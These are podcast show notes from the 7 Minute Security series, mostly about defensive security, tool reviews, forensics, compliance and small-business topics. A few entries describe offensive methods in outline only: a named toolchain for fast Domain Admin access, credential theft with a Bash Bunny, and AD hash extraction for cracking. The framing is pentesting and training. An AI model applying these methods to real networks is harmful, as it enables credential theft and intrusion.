Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription. Today's episode is a follow-up interview with Joe Klein, who is my good pal, a former coworker, and a SOC analyst extraordinaire. You might remember Joe from things such as...this podcast - episode #290 to be exact. When we last left Joe, he had just started an exciting new journey as a SOC analyst, and also picked up a new sweet gig teaching college-level security courses. So Joe and I sat down last week in the 7 Minute Security studios to talk with Joe about: How to be an absolute beast at networking Seizing new opportunities (even if it seems scary) Good certs for security newbs (and not-so-newbs) to pursue Life as a SOC analyst How to learn security by teaching it! This interview was an absolute blast to work on with Joe, and after it was over, neither of us could believe that the run time was nearly 2 hours! So in order to help you navigate the episode and have the best listening experience possible, we created the following "Choose Your Own Adventure" timeline with the high (and low?) discussion points of the interview. Enjoy! (Interview timeline available on 7MS under episode #321)

Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription. This week I sat down with Lane Roush of Arctic Wolf to discuss the big hairy beast that is...(insert dramatic music here) logging and alerting! I work with a lot of clients (and you probably do too) who want answers to these questions: What in the world is going on in my network? How will I know if bad stuff is happening? If I do identify the bad stuff and attempt to eradicate it, how will I know if I've exorcised all the demons? So Lane and I sat down to discuss this conundrum, and explore answers to other burning questions like: Why is it so hard to separate the signal from noise when trying to figure out what's happening in the bowels of your network? Should logging/alerting be a full-time job for one or more people? When does it make sense to outsource these responsibilities? Check out today's interview to learn more, and also reach out to Arctic Wolf on their Twitter or LinkedIn for more information.

Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription. In today's episode, I talk about my fun experience using the Sn1per automated pentesting tool. It's really cool! It can scan your network, find vulnerabilities and exploit them - all in one swoop! It also does a nice one-two punch of OSINT+recon if you feed it a domain name. And, I tell a painful story about how a single checkbox setting in a firewall cost me a lot of hours and tears. You can LOL at me, learn from my pain, and we'll all be better for it.

Today's episode is brought to you by ITProTV. Visit itpro.tv/7ms and use code 7MS to get a FREE 7-day trial and 30% off a monthly membership for the lifetime of your active subscription. This week's show is another interview episode - this time with my pal Bjorn Kimminich of the OWASP Juice Shop. If you've never heard of the Juice Shop before, it's the world's most secure (and I mean that sarcastically) online shopping experience. Actually, it's chock full of security issues, which makes it a fantastic learning tool for Web app pentesters, be they seasoned or total newbs. Bjorn and I sat down (over Skype) to discuss: How the Juice Shop came to be The current status of application security (is it getting any better?!) Common vulnerabilities still found in today's Web apps Juice Shop being featured in Google's Summer of Code How dev teams can better bake security into their products What's next for the Juice Shop (hint: stay tuned after the episode is over for a hint on one new "feature") Bjorn has gone to great lengths to provide documentation about how to get up and running with a copy of the Juice Shop to begin your hacking. Personally I find it dead simple to follow Bjorn's instructions for spinning up a Docker container: docker pull bkimminich/juice-shop docker run --rm -p 3000:3000 bkimminich/juice-shop Should you find the Juice Shop to be a valuable tool, please be sure to ping Bjorn on Twitter to let him know. Be sure to follow the Juice Shop on Twitter as well. Psst...this account sometimes tweets coupon codes which can help you unlock certain challenges!

Today's interview features Justin McCarthy, CTO and cofounder of StrongDM, which offers both commercial and open source tools (like Comply) to help customers with SOC compliance. Justin schooled me (in a nice way) about a lot of things, including: What SOC and the various SOC types are all about What SOC compliance costs What to look for in selecting a good auditor Tools that can help companies make SOC compliance efforts go more smoothly

In this episode I wanted to give you some cool/fun updates as it relates to 7MS the business! Specifically: A new member of the 7MS team (kinda!) The weird and varied projects I'm working on Upcoming podcast sponsors (probably in July) 7MS has a "real" office coming soon to the southern metro of MN (hopefully!)

As a continuation of last week's episode I'm now making a bit of progress in finding a good backup solution that protects USB backups both at rest and when pumped up to the cloud. I mentioned I've been using BackBlaze for backups (not a sponsor), and they allow you to backup USB drives as long as they're connected at least once every 30 days. That's cool. However, many of my USB drives are not encrypted, and I want to protect myself in the off chance that someone breaks in and steals all my stuff while those unencrypted drives are connected. My BackBlaze backup PC is just a little dinky box running Windows 10 Home, so I don't have access to BitLocker. I was gonna drop the ~$100 for the Windows 10 Pro upgrade, but I coincidentally was doing an endpoint security product evaluation at the same time, and so I grabbed a copy of ESET's DESLock (also not a sponsor) because it was on sale. Where I'm stuck now is that the USB drives are unlocked, and yet for some reason BB can't properly back them up. I've got a ticket into their support folks, and will update you once we get to part 3 of this miniseries.

You probably create DR plans for your business (or help other companies build them), but have you thought about creating one for yourself? Yeah, I know it's grim to think about "What will my loved ones do to get into my accounts, backups, photos, social media accounts..." but it's probably not a bad idea to prepare for that (spoiler alert: we all die at some point). Today I talk about how I'm beginning to build such a plan so my wife can take over for my/our online accounts. This plan includes: A "here's how I run all our technology" Google doc with domains I have registered, their expiration date, what their function is, etc. A how-to guide on restoring data from our online backup solution Implementation of a password manager

As I was preparing for my Secure 360 talk a month or so ago, I stumbled upon this awesome article which details a method for getting Domain Admin access in just a few minutes - without cracking passwords or doing anything else "loud." The tools you'll need are: PowerShell Empire DeathStar Responder Ntlmrelayx I've written up all the steps in a gist that you can grab here. Enjoy!

It has been a heck of a week (in a good way), and I'm taking a break from security so you can help me untangle a mystery that's been wrapped around my brain for years. I need you to help me figure out what this dude meant when he said that something was as frustrating "as boxing a cat." P.S. if you hate off-topic episodes no worries! We'll be back to our regularly scheduled security program next week!

This week I dove into building a Cuckoo Sandbox for malware analysis. There are certainly a ton of posts and videos out there about it, but this entry called Painless Cuckoo Sandbox Installation caught my eye as a good starting point. This article got me about 80% of the way there, and the last 20% proved to be problematic. I got some additional answers from the Cuckoo documentation but still left some answers to be desired. Through a lot of Googling, banging my head against the wall and looking at the GitHub issues list, I finally got everything working. I've taken my entire build process and included it as a gist here. Enjoy!

Last week I was in the recording studio to record three 7MS commercials aimed at churches. The goal was to educate them on some security topics and close with a "hook" to contact 7MS for help securing your church. The commercials themselves are embedded in this episode so please have a listen and let me know what you think! I'll also let you know (via the podcast) when these commercials hit the air. It's likely the station won't air in your area, but you can catch it on the interwebs if you so desire (thanks again for your support, mom).

Cracking passwords in the cloud is super fun (listen to last week's episode to learn how to build your own cracking box on the cheap at Paperspace)! In the last couple weeks, customers have asked me about doing a password strength assessment on their Active Directory environment. I asked around and read a bunch of blogs and found a method that I think: Extracts the hashes safely Parses down the dump to contain only the hashes (so that if somebody popped my Paperspace cloud-crackin' box, they'd have just a list of half-cracked hashes and that's it) Does the work pretty automagically I talk about this in more detail in today's podcast, and here's the gist you can follow with all the necessary commands to get AD crackin'!

I had an absolute ball this week trying to figure out how to crack passwords effectively, and on the cheap, and in the cloud. Today's episode goes into much more detail, and embedded below is the Gist of my approach thus far. If you've got things to add/suggest to this document, let me know! P.S. if you don't see the gist because you're reading this in a podcast-catching app, head to https://7ms.us and look up today's episode and you'll see the gist in all its gisty glory!

Hey, so this week I am without my main machine - thus no jingle or "jungle boogie" intro music. Feels weird. Feels real weird. Anyway, ya know how I teased last week that 7MS could possibly be coming to a radio station near you? Well I think it's more of a probability than a possibility at this point! I met with a radio exec a few weeks ago and we talked about: Lots of people still listen to the radio (who knew?) Creating a "security minute" spot that would lead to a commercial about 7MS How to write a good commercial "hook" It's difficult to write a 60-second commercial! Targeted advertising at churches, which is an under-served market when it comes to infosec Writing a new (shortened) 7MS jingle More on this today on 7MS!

We've dug into some pretty technical topics the last few weeks so we're gonna take it easy today. Below are some FAQs and updates I'll cover on today's show: FAQs What security certs should a sales person get? What lav mic should I get for podcasting? How do I know if I'm ready to take the OSCP? When are you gonna do some more YouTube videos? When will the PacktPub project be done? Updates Don't forget to check out these new and/or updated pages on BPATTY: Caldera LAPS PwnedPasswords Speaking engagements I learned that the Cryptolocker song was played as muzak for a security conference. That makes me LOL ;-) Those of you in Minneapolis/St. Paul are invited to join me for Blue Team on a Budget lunch and learn at Manny's - it's on May 3 and hosted by OneIdentity. I'll be at Secure360 on May 16 to give my Blue Team on a Budget talk at 9:30 a.m., and I'll also be hosting our pal Bjorn for his Twin Cities vs. OWASP Juice Shop workshop on May 17. Gonna be awesome - hope you can come to either event (or both!).

Today is part two of evaluating endpoint solutions, where I primarily focus on Caldera which is an adversary simulation system that's really awesome! You can essentially setup a virtual attacker and cut it loose on some test machines, which is what I did as part of an endpoint protection evaluation project. The attacks simulated are from Adversarial Tactics, Techniques & Common Knowledge (ATT&CK) project. So the big question is...did any of these endpoint solutions catch some of the simulated ATT&CKs? Check out today's podcast to find out! Oh, and I wrote up my quick install guide for Caldera here.

I've been super pumped about Troy Hunt's Pwned Passwords project ever since it came out - especially when I saw a tweet about using it in Active Directory so that enterprises could essentially stop people from picking previously pwned passwords! That led me to explore the following two solutions: Pwned Passwords DLL This blog entry has everything you need to get started with this GitHub project. If you've got some coding skillz you can probably give everything a quick read and have the DLL installed and running in no time. If you're like me and have little to zero Visual Studio experience, head to my BPATTY site page about Pwned Passwords where I've laid everything out step-by-step! Bottom line is this is a FREE way to check AD passwords against Troy's list of 500M+ previously pwned passwords. Awesome dude! SafePass.me I gave this commercial solution a demo and it worked fine as well. It's about $700 USD and comes packaged in an .MSI file that you simply double-click to install, then reboot the domain controller(s). It looks to do the exact same thing as Pwned Passwords DLL but without having to build a DLL or install it manually.

I'm working on a fun project right now where I'm evaluating endpoint protection solutions for a client. They're faced with a choice of either refreshing endpoints to the latest gen of their current product, or doing a rip and replace with something else. I've spun up a standalone AD environment with ~5 Win 10 VMs and nothing on 'em except a current set of patches. The idea is I can assign each workstation VM an install of INSERT_NAME_OF_POPULAR_AV_VENDOR_HERE and have somewhat of a "bake off." Now what I'm finding is there are great sites like [AV Test](AV Test) or AV-Comparatives do a nice job of breaking down what kind of performance, features, and management offerings a given vendor has. But what I haven't found is some structured testing for "act like a bad guy" actions. I'm thinking things like: Mimikatz tomfoolery Lateral attacks with Metasploit shells Egress port scanning (to find an acceptable outbound port for C2 or data exfil) Jacking around with various PowerShell scripts and commands However, thanks to some awesome friends on Slack they pointed me to what looks to be a nice set of scripts/tests - many of which could be used to see what kind of behaviors the endpoint protection will catch. So coming up in part #2 of this series, I'll do a deeper dive into: RTA Atomic Red Team

I've had a fun week with a mixed bag of security related stuff happening, so I thought I'd throw it all in a big stew and cook it up for today's episode. Here are the highlights: Bash bunny preso I had a fun opportunity this week to speak to some property managers about the threats the Bash Bunny poses to an environment. Specifically I showed the one-two punch of: How BB can steal your wireless network pre-shared keys that are saved to your PC How BB can go into "Responder mode" to capture credentials From the comfort of my mom's basement I can steal all this stuff, have it emailed to me, then drive up to your parking lot and join your wifi network with valid network creds! Sneaky bunnies FTW! Bloodhound I got to run this on a big AD environment this week and the results were super interesting. I'm working on a down and dirty Bloodhound quick start guide for BPATTY (coming soon). Brian's botched wireless Lesson learned this week: doing large Nessus scans from your home network can crush your ERX so scan with care (specifically, go into your Nessus policy and don't scan as many hosts simultaneously - I cranked mine down from like 100 hosts at a time to 5).

Intro CredDefense is a freakin' sweet tool from the fine folks at Black Hills Information Security that does some really nifty things: Password filter Lets say you use the out-of-the-box password policy that comes with Active Directory, and you want to change your password to Winter2017! - AD is gonna say "Yeah dude/dudette, go for it...it fits the bill!" But from an attacker's perspective we know this is bad - people love to pick bad seasonal passwords like Winter2017, Summer2019, etc. With CredDefense's password filter in the mix, any new password gets checked against an additional word list, and if there's a match found within, BAM!! - password rejected. Password audit Ok, so now are you curious who in your AD environment is already using crappy passwords like Winter2017? Load up the password audit feature, feed it a big wordlist like rockyou, and you'll be good to go in no time. ResponderGuard This is a nifty PowerShell tool that can jack with pentesters/attackers in your environment who are running the popular cred-stealing Responder tool. And what I especially appreciate from a blue team perspective is that if ResponderGuard catches Responder in use in the environment, it can stamp a log in the event log, which can then in turn generate an email if you're using something like WEFFLES (which we talked about recently) and the nifty WEFFLES email script my pal hackern0v1c3 put together here.

In today's continuation of last week's episode I'm continuing a discussion on using free tools to triage Windows systems - be they infected or just acting suspicious. Specifically, those tools include: FTK Imager - does a dandy job of creating memory dumps and/or full disk backups of a live system. You can also make a portable version by installing FTK Imager on a machine, then copying the C:\Program Files\wherever\FTK Imager\lives to a USB drive. FTK on the go! Redline grabs a full forensics pack of data from a machine and helps you pick apart memory strings, network connections, event logs, URL history, etc. The tool helps you dig deep into the timeline of a machine and figure out "What the heck has this machine been doing from time X to Y?" DumpIt does quick n' dirty memory dumps of machines. Volatility allow you to, in a relatively low number of commands, determine if a machine has been up to no good. One of my favorite features is extracting malware right out of the memory image and analyzing it on a separate Linux VM with something like ClamAV.

I had the privilege of creating a Windows System Forensics 101 course/presentation for a customer. The good/bad news is there is so much good information out there, it's hard to boil things down to just an hour. For the first part of the presentation, I focused on Mark Russinovich's technique of using Sysinternals as the primary surgical tool. This approach includes things like: Use Process Explorer to find processes with no signature and/or description. Put any suspicious processes to sleep before killing them (it's more humane! :-) Use autoruns to find registry entries, scheduled tasks, etc. that might be hooked to malicious executables that run on startup. Rinse and repeat. In part 2 (coming up soon!), I'll continue the forensics fight and talk about tools like Redline, Volatility and FTK Imager! Stay tuned.

Last week I talked about how business has been going with the LLC. Today I answer some additional questions that I didn't have time to address: How I'm finding leads/projects to work on (TLDR: I'm NOT sending 1TB of PDFs to people, spamming them, calling them endlessly or LinkedIn'ing everybody and their mom) The interesting conversations I'm having with customers who seem a little tired of the traditional pentest/assessment song and dance (spoiler alert: they're looking for people with solutions and who will actually help remediate the stuff in the report!) The training services I'm offering are getting a lot more interest than I expected - and I think that's due to some of the sessions being more technical, yet not as intense as, say, a SANS course or the OSCP. More on today's show!

Intro Here's some of the "juice" that has helped 7MS have a successful start: Support system Ok so I think if you're going to have a successful business, you need an awesome support system. Mine consists of some of these things: Faith - I'm a Christian and pray about this business constantly. In fact I learned really quickly how easy it is to brag about your rock-solid faith when everything is going fine. And then when suddenly the rug is pulled out from under you, you find what your faith is really made of! My wife - she's my biggest supporter and cheerleader. Financial advisor - we have a great "money guy" who helped us plan for moments like these, where income might be slower as I drum up business. Trusted advisors - I'm blessed to have a partner called InteProIQ that has been a sounding board for a zillion and one questions. Everything from helping me quote projects and set hourly rates to marketing plans and connecting me with other business owners and contacts. General "get your business started" stuff Form your LLC - I just Googled how to do it, and found a bunch of articles with good info. Basically I found my state's Web site hierarchy and within that was a place to register the LLC and grab an EIN for tax purposes. Bank accounts - I visited my local banker and setup work checking/savings/etc. Tech tools to help you get the job done Quickbooks - I use this to keep track of expenses, send out quotes, reconcile invoices, etc. Expensify - I use it to track receipts and mileage. They even give you an email address where you can forward receipts to and it'll work it's awesome OCR magic to automatically extract the vendor, charge and date. Awesome! Toggl - a free Web interface (and app) to track time for projects (if the client doesn't already have something they want me to use) ....more on 7MS.us!

WEFFLES are delicious! WEFFLES stands for Windows Event Logging Forensic Logging Enhancement Services and is Microsoft's cool (and free!) console for responding to incidents and hunting threats. I had a chance to play with it in the lab this week and for the most part, the install of WEFFLES went well, but I had one minor issue that was cleared up easily. As I went through the MS TechNet article, I wrote a full install write-up on my BPATTY site. So go gobble up some WEFFLES and let me know how it goes!

Today I'm excited to be joined by my friend and advisor Kevin Keane (Twitter / LinkedIn) who is a lawyer, blogger, keynote speaker, business advisor, and just all around great guy. Kevin and I sit down to talk about: How SMBs can take some productive security baby steps How to get the most value out of your next security consultant engagement Can breaches ever be funny? What is the Trust Calculus? Do I need to care about GDPR? That and much more is coming up today on this special interview edition of the 7 Minute Security podcast!

GDPR in a nutshell GDPR, in a nutshell, is a set of legal regulations focused on the privacy of personal information for EU citizens - no matter where they are. Entities that store and/or process personal information about EU citizens must clearly explain to the citizens what data is being stored and processed, and any parties the data is being shared with. The citizens must opt-in and agree to each instance or reason that their data is being stored and processed. The citizens also must be able to, at any time, request a copy of the data or request that it be deleted. How does GDPR define "personal data" As “any information relating to an identified or identifiable natural person." When do GDPR regulations start being enforced? May 25, 2018. What are the key roles organizations need to be aware of as it relates to handling data under GDPR regulations? Two primary roles: Controller An entity that determines the purposes, conditions and means of the processing of personal data Processor An entity which processes personal data on behalf of the controller What are the GDPR lawful basis for processing data? Consent: the individual has given clear consent for you to process their personal data for a specific purpose. Contract Legal obligation Vital interests Public task Legitimate interests Are there any good step-by-step guides to GDPR compliance? This site lays things out at a high level with a 12-step program, if you will. How can I learn more about GDPR? This http://gdprandyou.ie/ site is a great GDPR primer, and this PDF from Imperva is good as well. I also googled GDPR for dummies and found some good results too :-)

Back in episode 280 I talked about how I started working with PacktPub to start authoring a video course on vulnerability scanning using Kali. Since that episode I've found that recording and editing high quality video clips is taking waaaaaayyyyyyyyyyy longer than I'd like, but it's worth it to create good stuff! PacktPub authored a tool called Panopto to make videos, but I found it a little frustrating to work with, so I'm going with the following janky - but functional - recording setup: Record raw video using iShowU Pull that video into iMovie and cleanup all the mistakes Record audio in Quicktime Pull audio clips into iMovie and edit those to match up with what's happening in the video Export video as 1080p Additionally, here are a few little tweaks that help the content creation match up with PacktPub's requirements: Resolution should be 1920x1080 (full HD) - I just bought a secondary monitor for this. Specifically, an HP 22cwa. I set my .bashrc file to use all white for the terminal prompt. See this article which helped me out. In Terminal I created a PacktPub profile that has font as Monospace Regular 20pt.

Hey folks, I had originally planned to cover the CredDefense toolkit but I couldn't get it working. I'm basically having the same issue that someone reported here. Sooooo....will have to save that for next week. In the meantime, this episode features a story about how I nearly knocked a retina out of my sister's face with an ice ball when I was about 8 years old. Yep, she's still mad about it, but I think 2018 is the year for forgiveness! Enjoy, and we'll talk to you in 2018. Blessings to you and yours!

Did I mention I love the Critical Security Controls? I do. And here's an absolute diamond I found this week: This site (http://www.auditscripts.com/free-resources/critical-security-controls/) offers awesome CSC-mapping tools (and they're free!), specifically: A spreadsheet with how the CSCs map to other popular frameworks like ISO and NIST A manual assessment tool for measuring your org - or someone else's org - against the CSCs. Flippin' sweet right? RIGHT! Also, be sure to come and Slack chat with us, as my pal hackernovice is building a tool called MacMon to help you satisfy CSC #1! Lastly, I built an LOL-worthy pentesting recon tool called SSOTT (Scan Some of the Things) that might help you automate some NMAPing, DIRBing, NIKTOing, and the like. Cheggitout!

My pal and former coworker Joe Klein joins me in the virtual studio to discuss: His career as a diesel mechanic and insurance guru How to leave a stable job, take a huge pay cut and start a risky infosec internship (sounds like the name of a broadway musical!) The start of his new career as a SOC analyst The importance of having a career cheerleader/mentor Being hungry for knowledge and certifications without being ashamed or afraid to look like a newb CompTIA Security+ and Cisco CCNA Cyber Ops certs The proper pronunciation of the word "dude" How to do a proper Arnold Schwarzenegger impression Other references made in the episode: Arnold Schwarzenegger the love poet Joe welcomes your comments, concerns, insults and questions via email (listen to today's episode for the address!) or Twitter.

Two weird things happening in this episode: I'm not in the car, and thus not endangering myself and others while podcasting and driving! My once beloved lav mic made a trip through the Johnson family's washer and dryer. I don't know that she'll ever record anything again. We'll see once it fully dries out (fingers crossed). I spent some time this last week getting back into Windows systems forensics, which has been really fun. If you want a play-by-play guide with some fantastic, practical, hands-on advice, grab yourself a copy of the Blue Team Handbook: Incident Response Edition. I also started a forensics page on BPATTY. Also, I picked up a Google Home Mini for $30 and can honestly say it quickly has found a special place in my tech/geek heart...even if it is recording everything I say and sending it to the NSA. But a small device that will play Michael Buble's Christmas album as soon as I command it with my voice? Worth the privacy sacrifice. Finally, if you're in the St. Paul, MN area tomorrow and wanna hear me come talk about "Blue Team on a Budget," come to the Government IT Symposium - more info here.

Sorry the podcast is late this week - but it's all for good reasons! I'm busy as a bee doing a ton of pentesting so I have a smattering of random security stuff to share with you: Mac High Sierra root bug Did you hear about this? Basically anybody could log in as user root on your system without a password because...there isn't a password! Read the Twitter thread where I originally read the news here, read about the root account madness here, and then read how the fix broke file sharing here. BPATTY ROCKS! I tried to wiki-fy my BPATTY project to make it a bit easier to read, so head to bpatty.rocks and let me know what you think! I'm BURPing a lot I can't tell you how fun it has been to get back in the pentesting saddle and hack some Web sites these past few weeks. Here are a few tips/tricks others taught me that have helped me get back in the swing of things: In Burp, state files are being depreciated in favor of project files. Read more here For BApp extensions, here are a few that help you get the job done: retire.js looks for old/outdated/vulnerable Javascript libraries Software vulnerability scanner helps you find vulnerable software, such as old versions of IIS CO2 has a bunch of tricks up its sleeve - my favorite of which is helping you craft sqlmap commands with the right flags More on today's show!

Well, after over-teasing this last week, I'm excited to announce that I've started my own company! 7 Minute Security, LLC gives me an outlet to do all my favorite infosec stuff, such as: Network assessments Vulnerability scanning Penetration testing Training Public speaking I welcome you to check out 7MinSec.com for more information. Or 7MinuteSecurity.com or SevenMinuteSecurity.com. Collect 'em all! What does this mean for the podcast? Nada - I'll keep cranking it out. Maybe we'll cover a few more business related topics (people have asked about how to get an LLC off the ground, so I might do an episode or two on that), but otherwise everything's the same! What about the Patreon project? Because I've been blessed with this opportunity - which will in turn help me keep the 7MS lights on - the Patreon campaign will close down soon. For you lovely Patreons, I've sent you a message (via Patreon site and via email) with more details.

We're continuing to hammer on the CSCs again this week. Here's some rad resources that can get your CSC efforts in the right direction: CIS Implementation Guide for SMEs CIS Cybersecurity quarterly newsletters Netdisco lets you locate machines by MAC or IP, show the corresponding switch port, and disable it if necessary. Defensive Security Handbook isn’t specifically mapped to CSCs but offers great advice to tie into them. Open-Audit tells you what’s on your network, how it’s configured, and when it changes.

Nothing to do with security, but I've heard this song way too much this week. I love the CIS Controls but it seems like there isn't a real good hands-on implementation guide out there. Hrmm...maybe it's time to create one? Speaking of that, check out the MacMon project and chat with us about it via Slack. After hearing rave reviews about Fingbox (not a sponsor), I picked one up (~$120) and wow, I'm impressed! It's got a lot of neat features that home users and SMBs would like as it related to mapping to CSC #1: Ability to map network devices to users to create an inventory Email alerts for new devices that pop up on the network Block unwanted users from the app, even when not directly connected to the LAN Nice set of troubleshooting tools, such as wifi throughput test, Internet speed test, and port scanning of LAN/WAN devices More on today's show...

For a long time I've been electronically in love with the Critical Security Controls. Not familiar with 'em? The CIS site describes them as: The CIS Controls are a prioritized set of actions that protect your critical systems and data from the most pervasive cyber attacks. They embody the critical first steps in securing the integrity, mission, and reputation of your organization. Cool, right? Yeah. And here are the top (first) 5 that many organizations start to tackle: Inventory of Authorized and Unauthorized Devices Inventory of Authorized and Unauthorized Software Secure Configurations for Hardware and Software Continuous Vulnerability Assessment and Remediation Controlled Use of Administrative Privileges Google searches will show you that you can definitely buy expensive hardware/software to help you map to the CSCs, but I'm passionate about helping small businesses (and even home networks!) be more secure, so I'm on a quest to find implementable (if that's a word?) ways to put these controls in place. I'm focusing on control #1 to start, and I've heard great things about using Fingbox (not a sponsor) to get the job done, but I'm also exploring other free options, such as nmap + some scripting magic. More on today's episode...

My plans for this week's podcast went hush-hush, kablooie, bye-bye, see ya, adios. So, I'm pinch-hitting and going off-topic and talking about...of all things...cops. Now wait! Wait wait! Don't run away. I'm not going all political on you or anything like that. Just wanna share some anecdotes and perspectives on the following: What it was like growing up with a dad who was a cop Losing a cousin in the line of duty Getting a call from my local police department this week claiming I was a danger to a school bus full of kids. Whaaaaa? Oh, and I sing a little bit on this episode too.

I'm gonna level with you: it's been a heck of a week. So I thought I'd try something a little different (and desperate?) and use this episode to answer some FAQs that come in via email and Twitter DM. Today's burning questions include: Q: Do I think it's dangerous to podcast and drive? A: Not really, especially now that I got one of these babies. Q: What is the eJPT cert all about? A: It looks like a pentest training/cert path that sits somewhere (difficulty wise) between CEH and OSCP. It's favorably reviewed and will set you back a few hundred dollars. Have you taken this cert? I'd love your feedback and, if possible, to do a mini Skype interview with you for the show. Drop me a note and lets chat. Q: What's a good place to practice Web hacking skills online? A: I've been a long time fan of Juice Shop, and up next in my queue is HackTheBox. Q: Any more Vulnhub.com VMs in the works? A: Kinda. Listen to today's episode :-)

I went to my first ever banking-focused infosec conference a few weeks ago (WBA's Secure-IT) and learned a ton. I met some really great people and had many productive conversations around security. The main takeaways from the conference that I talk about in today's episode: Standing all day and talking about security is exhausting! You can thwart "swag whores" (sorry mom, but I learned that that's what they're called!) by pushing your merch table deep into the booth so it's touching the rear curtain. That way people have to go through your "people perimeter" and engage in conversation with you in order to be granted access to the swag! From the conversations I had with the staff at these small banks, they're definitely wanting to slurp up as much helpful info from the sessions as possible. Specifically, finding ways to better improve security posture using free/cheap tools is ideal! I attended a few sessions that got my blood boiling. The outline of these talks went something like this (slight exaggeration added, but not much): Hackers are way smarter and more physically attractive than you, and they can get by all your defenses with ease You're helpless, hopeless, and not physically attractive Luckily we (Vendor X) are here and we offer our patented Super Solution Y that will thwart the APTs 100% of the time, no question, guaranteed People don't appreciate being talked down to, nor do they want to be shamed, blamed or scared into making security better. More on today's episode...

I'm excited to announce I'm going to be a PacktPub author! I'm going to work with them to create a course on network/vulnerability scanning. I'm pumped, but kinda nervous, so when I had the initial conversations with PacktPub staff, I made sure I hit them with my burning questions: Q: Are you going to ask me to create a sweet course and then pay me pennies for every digital copy sold? A: No. Authors get paid a lump sum up front and then share in profits for digital copies sold. Q: Who's gonna dictate the project outline - as well as timeline for recording it? A: It's a joint effort. The author dreams up the timeline, fine-tunes it with PacktPub, and then hammers out a mutually agreeable project timeline. Q: Do I have to buy some expensive software/hardware to make these videos? A: Not really. PacktPub did recommend I buy a better microphone (so I got a Snowball), and then they license authors a copy of Panopto to record the videos. More Qs and As covered on today's episode!

Intro The patching solutions review concludes this week with Ivanti's patch solution, as well as PDQ Deploy/Inventory. As a quick reminder, here's where our bake-off currently sits: Ninite (covered in 7MS #275) ManageEngine (covered in 7MS #277) Quick reminder: none of these solutions are bribing me with fat wads of cash to plug their products. Some day I hope to have such problems, but today is not that day. Ivanti You might know Ivanti as Shavlik - that's the product name I'm more familiar with anyways. Back in February, Shavlik became Ivanti. Pros Pretty easy to install and manage - even without a deep background in IT (in today's episode I tell a story that can back this claim based on my experience) Does a solid job of applying patching Windows OS and third party Cons Pricing is a little steep - last figures I saw were ~$80 per server, per year and ~$40 per workstation, per year. ITScripts library (that allows for GPO-style policy enforcement) is a little slim when compared to similar functionality offered from other solutions PDQ Deploy/Inventory Pros Lets you crazy with building custom packages you can deploy to granular groups Awesome online help resources, including a YouTube video library that's got a video for just about everything Quick response to support tickets Cons A bit more complicated to get comfortable with than the other solutions A little confusing on the Windows patching side - not quite as "point and patch" as some of the other solutions Agentless system - machines have to be able to "see" the PDQ

Intro We're breaking ground with this episode, folks! For the first time in 7MS history, we've got a guest on the show (finally, right?!). Rob Sell is an IT manager who has been working in IT for many years, with a focus on information security specifically for the last 4 years. He recently came home from Defcon 25 with a third place in the SE CTF. Rob sat down with me to discuss the CTF, how to make an outstanding CTF audition video, OSINT tools/tips/techniques, the value of tech/security certifications, career advice, and more! Interview notes and links Here's Rob's Defcon CTF audition video EchoSec helps you see a geographical area at a certain point in time. According to the Web site, EchoSec is "the most comprehensive social sentiment tool on the market" - hmmmm, seems like a great SE tool! X-Ray is "a tool for recon, mapping and OSINT gathering from public networks." Michael Bazzell's Web site has online training, free tools and other goodies. Michael also has some books. Christopher Hadnagy has a podcast that's strictly focused on SE. He's also got some books. ArcGIS isn't necessarily labeled as an SE tool, but can certainly be used for SE efforts.

ManageEngine Desktop Central Overall, I have to bluntly say that I really enjoyed playing with ManageEngine's solution. It's got a crap-ton of features built into it - above and beyond patching - that I think IT/security folks will really appreciate. Pros Agent or agentless management of systems MDM (didn't play with it but it certainly looks feature-rich) Application white/blacklisting Ability to push out configurations for things you'd normally use GPOs for - i.e. setting a login banner, enforcing screen locks, setting IE homepage and search engine, etc. Patch management is full-featured - it's easy to setup a simple "scan systems, download and deploy missing patches." Or just a "scan to identify missing patches" kind of thing. It's easy to run a variety of reports to find out which systems are most vulnerable, which patches are missing across the enterprise, etc. Software deployment engine - there's a big package library where you can easily search and deploy things like Dropbox, Adobe Reader, etc. It also includes a self-service portal where users can simply select certain packages and have them installed automagically! Inventory - ability to have detailed hardware/software level details on each machine. Ability to block software by path and/or hash. You can also give people a warning saying "We're gonna nuke dropbox in 2 days if you keep it on here!" Agent-based install gives you ability to chat with users, remote control systems, send announcements, drop to a command line at a target machine, etc. Reports - you can create a report for just about anything under the sun like AD group changes, user logon reports, users that are disabled/expired, and on and on... Email alerts - I think you can trigger an email alert for just about ANYTHING that happens in the environment. ...more on today's episode!

This is it! The worldwide Internet debut of an original infosec-themed song called CryptoLocker'd, and as the name implies, it's about a CryptoLocker incident. Here's the quick back story: A few years ago a worked on an incident response where a user got phished with a promise of a free burrito from Chipotle but instead got a free order of CryptoLocker! And rather than tell IT or sound the alarms, the user just left for the day! The next day they came back and the company was digitally on fire, and they played ignorant to what was going on. I found the user's handling of the situation humorous (read: not the CryptoLocker infection itself!), so I was inspired to write a song about it. Today's episode has the audio, and I welcome you to follow along with the lyrics below (head to 7ms.us to see the full lyrics as they are included in a GitHub gist)

This episode continues our series on comparing popular patching solutions, such as: Ninite ManageEngine Ivanti PDQ Ninite This week I focused on Ninite, and here's the TLDR version: Pros Does one thing (third party patching) and does it really well Extremely affordable User interface is clean, simple and really easy to use/learn Cons No "agentless" option - it's an agent or nothin' I'm not sure if Ninite has the brand name recognition and reputation to be accepted/respected by large companies I need to do more homework on how they pull down their packages...are they ripping apart packages and repackaging them at all? That could be a big avenue for side-loading icky stuff.

